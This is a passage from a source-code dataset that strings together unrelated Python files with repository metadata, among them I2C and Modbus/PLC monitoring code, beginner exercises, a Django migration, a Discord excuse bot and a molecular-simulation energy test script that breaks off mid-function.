print ("I2C: Device 0x%02X returned the following from reg 0x%02X" %
(self.address, reg))
print results
return results
except IOError, err:
return self.errMsg()
def readU8(self, reg):
"Read an unsigned byte from the I2C device"
try:
result = self.bus.read_byte_data(self.address, reg)
if self.debug:
print ("I2C: Device 0x%02X returned 0x%02X from reg 0x%02X" %
(self.address, result & 0xFF, reg))
return result
except IOError, err:
return self.errMsg()
def readS8(self, reg):
"Reads a signed byte from the I2C device"
try:
result = self.bus.read_byte_data(self.address, reg)
if result > 127: result -= 256
if self.debug:
print ("I2C: Device 0x%02X returned 0x%02X from reg 0x%02X" %
(self.address, result & 0xFF, reg))
return result
except IOError, err:
return self.errMsg()
def readU16(self, reg, little_endian=True):
"Reads an unsigned 16-bit value from the I2C device"
try:
result = self.bus.read_word_data(self.address,reg)
# Swap bytes if using big endian because read_word_data assumes little
# endian on ARM (little endian) systems.
if not little_endian:
result = ((result << 8) & 0xFF00) + (result >> 8)
if (self.debug):
print "I2C: Device 0x%02X returned 0x%04X from reg 0x%02X" % (self.address, result & 0xFFFF, reg)
return result
except IOError, err:
return self.errMsg()
def readS16(self, reg, little_endian=True):
"Reads a signed 16-bit value from the I2C device"
try:
result = self.readU16(reg,little_endian)
if result > 32767: result -= 65536
return result
except IOError, err:
return self.errMsg()
if __name__ == '__main__':
try:
bus = Raspi_I2C(address=0)
print "Default I2C bus is accessible"
except:
print "Error accessing default I2C bus"
|
[
"info@andypi.co.uk"
] |
info@andypi.co.uk
|
effc1a47e9c10e8be30971f66c7a6ff5d013ef58
|
5594de0c0417d792265a7f0ef6bd90d10ca4e9fb
|
/04-进阶语法/05-2-tdp.py
|
1bc8059a08734ad2764948c77042f7568079df17
|
[] |
no_license
|
ZHANGSTUDYNOTE/s_python
|
f0862a7e903ec5d88675743c49e5834365a4feab
|
0cd29c4bf2dc691705f79be6cf1e599cc8374fbf
|
refs/heads/master
| 2020-03-18T03:10:14.263514
| 2018-07-20T03:00:59
| 2018-07-20T03:00:59
| 134,225,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
import socket
# TCP server
def receiveData():
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.bind(("", 8899))
serverSocket.listen(5)
clientSocket, clientInfo = serverSocket.accept()
recvData = clientSocket.recv(1024)
print("TDP服务端")
print(clientInfo)
print(recvData)
clientSocket.close()
serverSocket.close()
# TCP client
def sendData():
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect(("127.0.0.1", 6666))
clientSocket.send(b"zhang")
recvData = clientSocket.recv(1024)
print("TDP客户端")
print(recvData)
if __name__ == '__main__':
# receiveData()
sendData()
|
[
"zhangpeicheng@kobox.tv"
] |
zhangpeicheng@kobox.tv
|
e035a1a7e3bac97d9b630bf4111fd496fab954b6
|
74b975adbda2c1ed2fd27c408a3efd805f90d428
|
/modules/remote_monitor/producer.py
|
eeca1cc02a0627def58b881869c14c28196e79f2
|
[
"BSD-3-Clause"
] |
permissive
|
bijbis/GMU
|
4fa19658633a71fbb3dea07d59bedfc2210db304
|
aabac6af5f070f6314223298c10eeeda0eedf7a5
|
refs/heads/master
| 2021-01-02T09:18:48.402817
| 2017-08-02T06:58:42
| 2017-08-02T06:58:42
| 99,192,084
| 0
| 0
| null | 2017-08-07T10:25:32
| 2017-08-03T04:54:10
|
Python
|
UTF-8
|
Python
| false
| false
| 3,011
|
py
|
import threading
import struct
import time
from modbus import Modbus
from pymodbus3.exceptions import ModbusException
from plc import hotlink
import sys
import os
class ProducerThread(threading.Thread):
def __init__(self, group=None, target=None, name=None, que=None,
args=(), kwargs=None, verbose=None):
super(self.__class__, self).__init__()
self.target = target
self.name = name
self.q = que
def run(self):
# modbus = Modbus.Modbus('paulharrison.hopto.org')
modbus = Modbus.Modbus('203.59.95.40')
while True:
item_remote_monitor = []
item_plc_monitor = []
try:
# Order: [current, power, voltage]
# current_avg = modbus.read(3008, 2) # 3008 stores average current
# power_avg = modbus.read(3057, 2) # 3057 stores average power
# voltage_avg = modbus.read(3024, 2) # 3024 stores average voltage
cur_A = modbus.read(40073, 2, device='GMU')
cur_B = modbus.read(40075, 2, device='GMU')
cur_C = modbus.read(40077, 2, device='GMU')
cur_Avg = modbus.read(40071, 2, device='GMU')
vol_AB = modbus.read(40079, 2, device='GMU')
vol_BC = modbus.read(40081, 2, device='GMU')
vol_AC = modbus.read(40083, 2, device='GMU')
vol_Avg = (vol_AB + vol_BC + vol_AC) / 3.0
power = modbus.read(40091, n=2, device='GMU', scalar=0.001)
item_remote_monitor.append(cur_A)
item_remote_monitor.append(cur_B)
item_remote_monitor.append(cur_C)
item_remote_monitor.append(cur_Avg)
item_remote_monitor.append(vol_AB)
item_remote_monitor.append(vol_BC)
item_remote_monitor.append(vol_AC)
item_remote_monitor.append(vol_Avg)
item_remote_monitor.append(power)
battery_voltage = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIZ*')
item_plc_monitor.append(battery_voltage.data * 0.001)
plc_voltage = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIX*')
item_plc_monitor.append(plc_voltage.data * 0.001)
charging_current = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIL*')
item_plc_monitor.append(charging_current.data * 0.001)
plc_power = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIY*')
item_plc_monitor.append(plc_power.data * 0.00001)
except struct.error:
print('Struct Error exception', file=sys.stderr)
os._exit(1)
except ModbusException:
print('Modbus I/O exception', file=sys.stderr)
os._exit(1)
self.q[0].put(item_remote_monitor)
self.q[1].put(item_plc_monitor)
time.sleep(60)
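# A minimal usage sketch (illustrative only; assumes two standard queue.Queue
# objects, one for the remote-monitor readings and one for the PLC readings):
# from queue import Queue
# q = [Queue(), Queue()]
# ProducerThread(name='producer', que=q).start()
# print(q[0].get())  # [cur_A, cur_B, cur_C, cur_Avg, vol_AB, vol_BC, vol_AC, vol_Avg, power]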
|
[
"mayukh2012@hotmail.com"
] |
mayukh2012@hotmail.com
|
63d8c16ac32d0421456ac272c279a8206acf14a7
|
c9bf4827148182056f50d61fa1488122858b06b5
|
/Python/Act_05/08.py
|
321a8edc4c74c6ddfc1a8211fb4f1c6b6598cd23
|
[] |
no_license
|
borjamoll/programacion
|
6501bfe8aa84e70e23a7d4dcf7c6292ae0f95d6a
|
279dd5434b4021fd12d4ddf59eb03151bc5bc8bb
|
refs/heads/master
| 2020-09-14T18:29:16.141150
| 2019-12-11T16:00:50
| 2019-12-11T16:00:50
| 223,214,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
h=int(input('The height, champ. '))
halt=1
for i in range (h):
asteriscos=halt*"*"
halt=halt+1
print (asteriscos)
halt=halt-1
for i in range (h-1):
halt=halt-1
asteriscos=halt*"*"
print (asteriscos)
|
[
"alumnedani@gmail.com"
] |
alumnedani@gmail.com
|
70e6763a7167494af1c8fa99208ce394137e55b8
|
0b0d3246d39974cb8faff7d269da2d539415afab
|
/problem_python/p99.py
|
948d0f8a4a30b16af95eec8908145aaf64df0eff
|
[] |
no_license
|
xionghhcs/leetcode
|
972e7ae4ca56b7100223630b294b5a97ba5dd7e8
|
8bd43dcd995a9de0270b8cea2d9a48df17ffc08b
|
refs/heads/master
| 2020-03-07T17:18:08.465559
| 2019-09-29T11:11:26
| 2019-09-29T11:11:26
| 127,607,564
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
# Definition for a binary tree node.
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution:
def recoverTree(self, root: TreeNode) -> None:
"""
Do not return anything, modify root in-place instead.
"""
def inOrder(root):
if root:
inOrder(root.left)
if self.preNode is not None:
if self.firstNode is None and self.preNode.val>= root.val:
self.firstNode = self.preNode
if self.firstNode and self.preNode.val >= root.val:
self.secondNode = root
self.preNode = root
inOrder(root.right)
self.preNode = None
self.firstNode = None
self.secondNode = None
inOrder(root)
self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val
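# A minimal usage sketch (added for illustration; uses the TreeNode definition
# above and the classic example [1,3,null,null,2], where 1 and 3 were swapped):
if __name__ == '__main__':
    root = TreeNode(1)
    root.left = TreeNode(3)
    root.left.right = TreeNode(2)
    Solution().recoverTree(root)
    print(root.val, root.left.val, root.left.right.val)  # expected: 3 1 2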
|
[
"xionghhcs@163.com"
] |
xionghhcs@163.com
|
b40bfde73e320dcb6f3a2b87ac5dceae370b147e
|
89c06ba007070ad07bd98798194d496c06f99fc9
|
/content/migrations/0002_content_author.py
|
9ca0e322587d2983ff04c2ca0bdd7f0f08801d4a
|
[] |
no_license
|
srcemre/Django-HotelResarvation
|
ac21bab7ef6f9162b6a127837dc18b4f523ee275
|
71731b09a30e51197a0b93f07dd0096534638e0d
|
refs/heads/master
| 2022-12-08T01:33:12.897852
| 2020-09-06T20:03:06
| 2020-09-06T20:03:06
| 251,089,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
# Generated by Django 3.0.3 on 2020-05-15 05:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('content', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='content',
name='author',
field=models.CharField(blank=True, default='admin', max_length=255),
),
]
|
[
"45533044+srcemre@users.noreply.github.com"
] |
45533044+srcemre@users.noreply.github.com
|
12a4fd41cd8308535a4ab2aae60f7a30b29dd050
|
5a3ec63587a3948928d735dca46792cadcb14170
|
/bofh.py
|
7f0d7859544348d8436e8732193a50f18665e818
|
[
"MIT"
] |
permissive
|
andrsd/discord-bofh-bot
|
9b9818a13d2e80f840f65d4f7a18eea41a75df9e
|
59b6d3f36086b127b13bf9e3891f9cc21009b67f
|
refs/heads/main
| 2023-01-21T22:53:56.270532
| 2020-12-05T15:34:07
| 2020-12-05T16:06:16
| 316,242,347
| 10
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
"""
BOFH - Bastard Operator From Hell
Bot for Discord
"""
import os
import random
import discord
from discord.ext import commands
from dotenv import load_dotenv
from excuses import excuses
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
bot = commands.Bot(command_prefix='!')
@bot.command(name='bofh', help='Responds with a random Bastard Operator From Hell quote')
async def bofh_quote(ctx):
response = random.choice(excuses)
await ctx.send(response)
@bot.command(name='topic-bofh', help='Sets the channel topic to a random Bastard Operator From Hell quote')
async def bofh_channel_topic(ctx):
response = random.choice(excuses)
if hasattr(ctx.channel, "edit"):
await ctx.channel.edit(topic=response)
bot.run(TOKEN)
|
[
"david.andrs@inl.gov"
] |
david.andrs@inl.gov
|
3d66ab6e1d1bc37c7984efb9fb66543357e2d7b5
|
d75cb3c2c5e06ab4057c60bb311c367c8f299a0a
|
/ctest.py
|
079d82bc4ebaac105a6f88604054be7b02be2ce2
|
[
"MIT"
] |
permissive
|
kmckiern/AMBER-FB15
|
2d7c8b2e19ad1d3abaf04437a16b6fcf01d6d206
|
9ef44ac2e03bdc0280d986bd220dea741d68d4df
|
refs/heads/master
| 2020-03-28T21:01:31.324309
| 2015-08-18T01:56:50
| 2015-08-18T01:56:50
| 39,044,777
| 0
| 0
| null | 2015-07-14T00:38:45
| 2015-07-14T00:38:45
| null |
UTF-8
|
Python
| false
| false
| 25,088
|
py
|
#!/usr/bin/env python
"""
Test ParmEd's ability to process a Gromacs position/topology file
by comparing Gromacs energy/force to OpenMM-via-ParmEd energy/force.
This script contains bits of ForceBalance to obtain the Gromacs energy/force
and also reads parts of the Gromacs .mdp file to set up the system.
There are also some OpenMM imports for calculating the OpenMM energy/force..
To run this script, provide a gro, top and mdp file. The difference from
test.py is that this script also runs AMBER.
Author: Lee-Ping Wang
"""
# General import
from collections import OrderedDict
import numpy as np
import os, sys, re, copy
import argparse
# ForceBalance convenience functions
from nifty import printcool, printcool_dictionary, _exec, which, wopen, isint, isfloat, logger
# Only needed for writing constrained .gro files
# from molecule import Molecule
# ParmEd import
from parmed import gromacs, amber
from parmed.amber.mdin import Mdin
from parmed.charmm import CharmmPsfFile, CharmmCrdFile, CharmmParameterSet
# OpenMM import
import simtk.unit as u
import simtk.openmm as mm
import simtk.openmm.app as app
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--amber', action='store_true', help='Pass this flag to run AMBER tests along with Gromacs / OpenMM.')
parser.add_argument('-c', '--charmm', action='store_true', help='Pass this flag to run CHARMM tests along with Gromacs / OpenMM and maybe AMBER.')
args, sys.argv = parser.parse_known_args(sys.argv)
# Gromacs settings
gmxsuffix="_d"
if which('gmx'+gmxsuffix) != '':
logger.info("Using double precision GROMACS version 5\n")
gmxpath = which('gmx'+gmxsuffix)
GMXVERSION = 5
elif which('mdrun'+gmxsuffix) != '':
logger.info("Using double precision GROMACS version 4\n")
gmxpath = which('mdrun'+gmxsuffix)
GMXVERSION = 4
else:
gmxsuffix=""
if which('gmx'+gmxsuffix) != '':
logger.info("Using single precision GROMACS version 5\n")
gmxpath = which('gmx'+gmxsuffix)
GMXVERSION = 5
elif which('mdrun'+gmxsuffix) != '':
logger.info("Using single precision GROMACS version 4\n")
gmxpath = which('mdrun'+gmxsuffix)
GMXVERSION = 4
else:
logger.error("Cannot find the GROMACS executables!\n")
raise RuntimeError
os.environ["GMX_MAXBACKUP"] = "-1"
os.environ["GMX_NO_SOLV_OPT"] = "TRUE"
os.environ["GMX_NO_ALLVSALL"] = "TRUE"
gmxprogs = ["anadock", "anaeig", "analyze", "angle", "bar", "bond", "bundle", "chi",
"cluster", "clustsize", "confrms", "covar", "current", "enemat", "energy",
"filter", "gyrate", "h2order", "hbond", "helix", "helixorient", "hydorder",
"kinetics", "lie", "luck", "mdmat", "membed", "mindist", "morph", "msd",
"nmeig", "nmens", "nmtraj", "options", "order", "pme_error", "polystat",
"potential", "principal", "protonate", "rama", "rdf", "rms", "rmsdist",
"rmsf", "rotacf", "rotmat", "saltbr", "sans", "sas", "select", "sgangle",
"sham", "sigeps", "sorient", "spatial", "spol", "tcaf", "traj", "tune_pme",
"vanhove", "velacc", "wham", "wheel", "x2top"]
def edit_mdp(fin=None, fout=None, options={}, defaults={}, verbose=False):
"""
Read, create or edit a Gromacs MDP file. The MDP file contains GROMACS run parameters.
If the input file exists, it is parsed and options are replaced where "options" overrides them.
If the "options" dictionary contains more options, they are added at the end.
If the "defaults" dictionary contains more options, they are added at the end.
Keys are standardized to lower-case strings where all dashes are replaced by underscores.
The output file contains the same comments and "dressing" as the input.
Also returns a dictionary with the final key/value pairs.
Parameters
----------
fin : str, optional
Input .mdp file name containing options that are more important than "defaults", but less important than "options"
fout : str, optional
Output .mdp file name.
options : dict, optional
Dictionary containing mdp options. Existing options are replaced, new options are added at the end, None values are deleted from output mdp.
defaults : dict, optional
defaults Dictionary containing "default" mdp options, added only if they don't already exist.
verbose : bool, optional
Print out additional information
Returns
-------
OrderedDict
Key-value pairs combined from the input .mdp and the supplied options/defaults and equivalent to what's printed in the output mdp.
"""
clashes = ["pbc"]
# Make sure that the keys are lowercase, and the values are all strings.
options = OrderedDict([(key.lower().replace('-','_'), str(val) if val is not None else None) for key, val in options.items()])
# List of lines in the output file.
out = []
# List of options in the output file.
haveopts = []
# List of all options in dictionary form, to be returned.
all_options = OrderedDict()
if fin is not None and os.path.isfile(fin):
for line in open(fin).readlines():
line = line.strip().expandtabs()
# The line structure should look something like this:
# key = value ; comments
# First split off the comments.
if len(line) == 0:
out.append('')
continue
s = line.split(';',1)
data = s[0]
comms = s[1] if len(s) > 1 else None
# Pure comment lines or empty lines get appended to the output.
if set(data).issubset([' ']):
out.append(line)
continue
# Now split off the key and value fields at the equals sign.
keyf, valf = data.split('=',1)
key = keyf.strip().lower().replace('-','_')
haveopts.append(key)
if key in options:
val = options[key]
val0 = valf.strip()
if key in clashes and val != val0:
logger.error("edit_mdp tried to set %s = %s but its original value was %s = %s\n" % (key, val, key, val0))
raise RuntimeError
# Passing None as the value causes the option to be deleted
if val is None: continue
if len(val) < len(valf):
valf = ' ' + val + ' '*(len(valf) - len(val)-1)
else:
valf = ' ' + val + ' '
lout = [keyf, '=', valf]
if comms is not None:
lout += [';',comms]
out.append(''.join(lout))
else:
out.append(line)
val = valf.strip()
all_options[key] = val
for key, val in options.items():
key = key.lower().replace('-','_')
if key not in haveopts:
haveopts.append(key)
out.append("%-20s = %s" % (key, val))
all_options[key] = val
# Fill in some default options.
for key, val in defaults.items():
key = key.lower().replace('-','_')
options[key] = val
if key not in haveopts:
out.append("%-20s = %s" % (key, val))
all_options[key] = val
if fout != None:
file_out = wopen(fout)
for line in out:
print >> file_out, line
file_out.close()
if verbose:
printcool_dictionary(options, title="%s -> %s with options:" % (fin, fout))
return all_options
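# A minimal usage sketch (illustrative only; "grompp.mdp" and "sp.mdp" are
# hypothetical file names):
# opts = edit_mdp(fin="grompp.mdp", fout="sp.mdp",
#                 options={"nsteps": 0, "nstfout": 1},
#                 defaults={"integrator": "md"})
# "opts" then holds the merged key/value pairs that were written to sp.mdp.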
def rm_gmx_baks(dir):
# Delete the #-prepended files that GROMACS likes to make
for root, dirs, files in os.walk(dir):
for file in files:
if re.match('^#',file):
os.remove(os.path.join(root, file))
def callgmx(command, stdin=None, print_to_screen=False, print_command=True, **kwargs):
# Remove backup files.
rm_gmx_baks(os.getcwd())
# Call a GROMACS program as you would from the command line.
if GMXVERSION == 5:
csplit = ('gmx ' + command.replace('gmx', '')).split()
else:
if command.split()[0] in gmxprogs:
csplit = ('g_%s' % command).split()
else:
csplit = command.split()
prog = os.path.join(gmxpath, csplit[0])
csplit[0] = prog + gmxsuffix
return _exec(' '.join(csplit), stdin=stdin, print_to_screen=print_to_screen, print_command=print_command, **kwargs)
def energy_termnames(edrfile):
""" Get a list of energy term names from the .edr file by parsing a system call to g_energy. """
if not os.path.exists(edrfile):
logger.error('Cannot determine energy term names without an .edr file\n')
raise RuntimeError
## Figure out which energy terms need to be printed.
o = callgmx("energy -f %s -xvg no" % (edrfile), stdin="Total-Energy\n", copy_stdout=False, copy_stderr=True)
parsemode = 0
energyterms = OrderedDict()
for line in o:
s = line.split()
if "Select the terms you want from the following list" in line:
parsemode = 1
if parsemode == 1:
if len(s) > 0 and all([isint(i) for i in s[::2]]):
parsemode = 2
if parsemode == 2:
if len(s) > 0:
try:
if all([isint(i) for i in s[::2]]):
for j in range(len(s))[::2]:
num = int(s[j])
name = s[j+1]
energyterms[name] = num
except: pass
return energyterms
def energy_components(Sim, verbose=False):
# Before using EnergyComponents, make sure each Force is set to a different group.
EnergyTerms = OrderedDict()
if type(Sim.integrator) in [mm.LangevinIntegrator, mm.VerletIntegrator]:
for i in range(Sim.system.getNumForces()):
EnergyTerms[Sim.system.getForce(i).__class__.__name__] = Sim.context.getState(getEnergy=True,groups=2**i).getPotentialEnergy() / u.kilojoules_per_mole
EnergyTerms['Potential'] = Sim.context.getState(getEnergy=True).getPotentialEnergy() / u.kilojoules_per_mole
return EnergyTerms
def interpret_mdp(mdp_file):
# Keyword args to pass to createSystem()
sysargs = {}
# Read stuff from the Gromacs .mdp file
# to inform how we build the OpenMM System
mdp_opts = edit_mdp(mdp_file)
if 'define' in mdp_opts:
defines = dict([(k.replace("-D",''),1) for k in mdp_opts['define'].split()])
else:
defines = {}
print "Defines:", defines
sysargs['rigidWater'] = 'FLEXIBLE' not in defines
# Constraints
constraint_map = {'none':None,'h-bonds':app.HBonds,'all-bonds':app.AllBonds,'h-angles':app.HAngles}
if 'constraints' in mdp_opts:
omm_constraints = constraint_map[mdp_opts['constraints'].replace('_','-').lower()]
else:
omm_constraints = None
print "Constraints", omm_constraints
sysargs['constraints'] = omm_constraints
# Periodic boundary conditions
if mdp_opts['pbc'].lower() in ['none', 'no']:
pbc = False
elif mdp_opts['pbc'].lower() == 'xyz':
pbc = True
else:
raise RuntimeError('Unsupported PBC')
# Cut-off radii and nonbonded method
if float(mdp_opts['rcoulomb']) != float(mdp_opts['rvdw']):
raise RuntimeError('Please set rcoulomb to equal rvdw')
if 'rvdw_switch' in mdp_opts:
sysargs['switchDistance'] = float(mdp_opts['rvdw_switch']) * u.nanometer
if mdp_opts['coulombtype'].lower() == 'cut-off':
if float(mdp_opts['rcoulomb']) == 0.0:
sysargs['nonbondedMethod'] = app.NoCutoff
elif pbc:
sysargs['nonbondedMethod'] = app.CutoffPeriodic
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
else:
sysargs['nonbondedMethod'] = app.CutoffNonPeriodic
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
elif mdp_opts['coulombtype'].lower() == 'pme':
sysargs['nonbondedMethod'] = app.PME
sysargs['ewaldErrorTolerance'] = 1e-5
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
return defines, sysargs, mdp_opts
def Calculate_GMX(gro_file, top_file, mdp_file):
#===============================#
#| GROMACS energies and forces |#
#===============================#
# Create .mdp file for single-point energies and forces.
shot_opts = OrderedDict([("nsteps", 0), ("nstxout", 0), ("nstxtcout", 0), ("nstenergy", 1), ("nstfout", 1)])
edit_mdp(fin=mdp_file, fout="enerfrc.mdp", options=shot_opts)
# Call grompp to set up calculation.
callgmx("grompp -f enerfrc.mdp -c %s -p %s -maxwarn 1" % (gro_file, top_file))
# Run gmxdump to determine which atoms are real.
o = callgmx("gmxdump -s topol.tpr -sys", copy_stderr=True)
AtomMask = []
for line in o:
line = line.replace("=", "= ")
if "ptype=" in line:
s = line.split()
ptype = s[s.index("ptype=")+1].replace(',','').lower()
AtomMask.append(ptype=='atom')
# Get the energy and the forces.
callgmx("mdrun -nt 1 -rerunvsite -rerun %s" % gro_file)
callgmx("energy -xvg no -f ener.edr -o energy.xvg", stdin='Potential')
Efile = open("energy.xvg").readlines()
GMX_Energy = np.array([float(Eline.split()[1]) for Eline in Efile])
callgmx("traj -xvg no -s topol.tpr -f traj.trr -of force.xvg -fp", stdin='System')
GMX_Force = np.array([[float(j) for i, j in enumerate(line.split()[1:]) if AtomMask[i/3]] \
for line in open("force.xvg").readlines()])
# Perform energy component analysis and return properties.
energyterms = energy_termnames("ener.edr")
ekeep = [k for k,v in energyterms.items() if v <= energyterms['Total-Energy']]
callgmx("energy -f ener.edr -o energy.xvg -xvg no", stdin="\n".join(ekeep))
ecomp = OrderedDict()
for line in open("energy.xvg"):
s = [float(i) for i in line.split()]
for i in range(len(ekeep) - 2):
val = s[i+1]
if ekeep[i] in ecomp:
ecomp[ekeep[i]].append(val)
else:
ecomp[ekeep[i]] = [val]
Ecomps_GMX = OrderedDict([(key, val[0]) for key, val in ecomp.items()])
return GMX_Energy[0], GMX_Force, Ecomps_GMX
def Calculate_ParmEd_OpenMM(gro_file, top_file, sysargs, defines):
#===============================#
#| ParmEd object creation |#
#===============================#
# Make sure the proper defines from the .mdp file are passed into the GromacsTopologyFile() :)
ParmEd_GmxTop = gromacs.GromacsTopologyFile(top_file, defines=defines)
ParmEd_GmxGro = gromacs.GromacsGroFile.parse(gro_file)
ParmEd_GmxTop.box = ParmEd_GmxGro.box
ParmEd_GmxTop.positions = ParmEd_GmxGro.positions
#===============================#
#| OpenMM simulation setup |#
#===============================#
# ParmEd creates System object
system = ParmEd_GmxTop.createSystem(**sysargs)
# Keep a record of which atoms are real (not virtual sites)
isAtom = []
for i in range(system.getNumParticles()):
isAtom.append(system.getParticleMass(i).value_in_unit(u.dalton) > 0.0)
# Setting force groups enables energy components analysis
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, mm.NonbondedForce):
f.setUseDispersionCorrection(True)
elif isinstance(f, mm.CustomNonbondedForce):
f.setUseLongRangeCorrection(True)
integ = mm.VerletIntegrator(1.0*u.femtosecond)
plat = mm.Platform.getPlatformByName('Reference')
# Create Simulation object
simul = app.Simulation(ParmEd_GmxTop.topology, system, integ, plat)
simul.context.setPositions(ParmEd_GmxGro.positions)
simul.context.applyConstraints(1e-12)
# Obtain OpenMM potential energy
state = simul.context.getState(getPositions=True,getEnergy=True,getForces=True)
parmed_energy = state.getPotentialEnergy()
parmed_forces = state.getForces()
pos = np.array(state.getPositions().value_in_unit(u.angstrom)).reshape(-1,3)
# Obtain and save constrained positions
# M = Molecule(gro_file)
# M.xyzs[0] = pos
# M.write('constrained.gro')
# Print OpenMM-via-ParmEd energy components
Ecomps_OMM = energy_components(simul)
printcool_dictionary(Ecomps_OMM, title="OpenMM energy components via ParmEd")
parmed_forces = np.array([f for i, f in enumerate(parmed_forces.value_in_unit(u.kilojoule_per_mole/u.nanometer)) if isAtom[i]])
return ParmEd_GmxTop, parmed_energy, parmed_forces, Ecomps_OMM
def Calculate_AMBER(Structure, mdp_opts):
pbc = mdp_opts["pbc"].lower() == "xyz"
# Create AMBER inpcrd file
inpcrd = amber.AmberAsciiRestart("inpcrd", mode="w")
inpcrd.coordinates = np.array(Structure.positions.value_in_unit(u.angstrom)).reshape(-1,3)
inpcrd.box = Structure.box
inpcrd.close()
# sander insists on providing a trajectory to iterate over,
# so we feed it the same coordinates again. But we don't use it
# because the positions are imprecise.
mdcrd = amber.AmberMdcrd("mdcrd", natom=len(Structure.atoms), hasbox=pbc, mode="w")
mdcrd.add_coordinates(np.array(Structure.positions.value_in_unit(u.angstrom)).reshape(-1,3))
if pbc:
mdcrd.add_box(Structure.box[:3])
mdcrd.close()
# Create AMBER prmtop object from ParmEd Structure :)
prmtop = amber.AmberParm.from_structure(Structure)
prmtop.write_parm("prmtop")
# Create AMBER mdin file and append some stuff
mdin = Mdin()
# Single point energies?
mdin.change('cntrl','imin','5')
# Periodic boundary conditions?
if pbc:
mdin.change('cntrl','ntb','1')
else:
mdin.change('cntrl','ntb','0')
# Cutoff zero is really infinite
if float(mdp_opts['rlist']) == 0.0:
mdin.change('cntrl','cut','9999')
else:
mdin.change('cntrl','cut',str(int(float(mdp_opts['rlist'])*10)))
# Take zero MD steps
mdin.change('cntrl','nstlim','0')
# Don't update nonbond parameters
mdin.change('cntrl','nsnb','0')
# if mdp_opts['coulombtype'].lower() == 'pme':
# mdin.change('ewald','order',5)
# mdin.change('ewald','skinnb',0)
mdin.write("mdin")
# Nonbonded method
if mdp_opts['coulombtype'].lower() == 'pme':
with open("mdin",'a') as f:
print >> f, """&ewald
order=5, skinnb=0
/"""
with open("mdin",'a') as f:
print >> f, """&debugf
do_debugf=1, dumpfrc=1
/"""
# Call sander for energy and force
os.system('rm -f forcedump.dat')
_exec("sander -O -y mdcrd", print_command=False)
# Parse energy and force
ParseMode = 0
Energies = []
Forces = []
Force = []
iatom = 0
isAtom = [atom.atomic_number > 0 for atom in Structure.atoms]
for line in open('forcedump.dat'):
line = line.strip()
sline = line.split()
if ParseMode == 1:
if len(sline) == 1 and isfloat(sline[0]):
Energies.append(float(sline[0]) * 4.184)
ParseMode = 0
if ParseMode == 2:
if len(sline) == 3 and all(isfloat(sline[i]) for i in range(3)):
if isAtom[iatom]:
Force += [float(sline[i]) * 4.184 * 10 for i in range(3)]
iatom += 1
if len(Force) == 3*sum(isAtom):
Forces.append(np.array(Force))
Force = []
ParseMode = 0
iatom = 0
if line == '0 START of Energies':
ParseMode = 1
elif line == '1 Total Force' or line == '2 Total Force':
ParseMode = 2
# Obtain energy components
ParseMode = 0
Ecomps = OrderedDict()
for line in open("mdout").readlines():
if "NSTEP = " in line:
ParseMode = 1
if ParseMode == 1:
if "=" not in line:
ParseMode = 0
continue
else:
ieq = None
wkey = []
# Assume the line is split-able
for i, w in enumerate(line.split()):
if w == '=':
ieq = i
elif i-1 == ieq:
Ecomps.setdefault(' '.join(wkey), []).append(float(w)*4.184)
wkey = []
else:
wkey.append(w)
Ecomps_Sav = OrderedDict()
for key in Ecomps:
if set(Ecomps[key]) == set([0.0]): continue
elif key.lower() in ['eptot', 'etot', 'volume', 'density']: continue
else:
Ecomps_Sav[key] = Ecomps[key][0]
Ecomps_Sav['EPTOT'] = Ecomps['EPtot'][0]
# Save just the first frame from the .mdcrd
Energies = Energies[0]
Forces = Forces[0]
return Energies, Forces, Ecomps_Sav
def Calculate_CHARMM(params, psf, crd, sysargs, defines):
# Compute the box dimensions from the coordinates and set the box lengths (only
# orthorhombic boxes are currently supported in OpenMM)
coords = crd.positions
# Create the OpenMM system
system = psf.createSystem(params, **sysargs)
# Keep a record of which atoms are real (not virtual sites)
isAtom = []
for i in range(system.getNumParticles()):
isAtom.append(system.getParticleMass(i).value_in_unit(u.dalton) > 0.0)
# Setting force groups enables energy components analysis
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, mm.NonbondedForce):
f.setUseDispersionCorrection(True)
elif isinstance(f, mm.CustomNonbondedForce):
f.setUseLongRangeCorrection(True)
integ = mm.VerletIntegrator(1.0*u.femtosecond)
plat = mm.Platform.getPlatformByName('Reference')
# Create Simulation object
simul = app.Simulation(psf.topology, system, integ, plat)
simul.context.setPositions(coords)
simul.context.applyConstraints(1e-12)
# Obtain OpenMM potential energy
state = simul.context.getState(getPositions=True,getEnergy=True,getForces=True)
parmed_energy = state.getPotentialEnergy()
parmed_forces = state.getForces()
pos = np.array(state.getPositions().value_in_unit(u.angstrom)).reshape(-1,3)
Ecomps_OMM = energy_components(simul)
printcool_dictionary(Ecomps_OMM, title="CHARMM energy components via ParmEd OpenMM")
parmed_forces = np.array([f for i, f in enumerate(parmed_forces.value_in_unit(u.kilojoule_per_mole/u.nanometer)) if isAtom[i]])
    return psf, parmed_energy, parmed_forces, Ecomps_OMM
def main():
# Command line arguments
gro_file = sys.argv[1]
top_file = sys.argv[2]
mdp_file = sys.argv[3]
# Parse the .mdp file to inform ParmEd
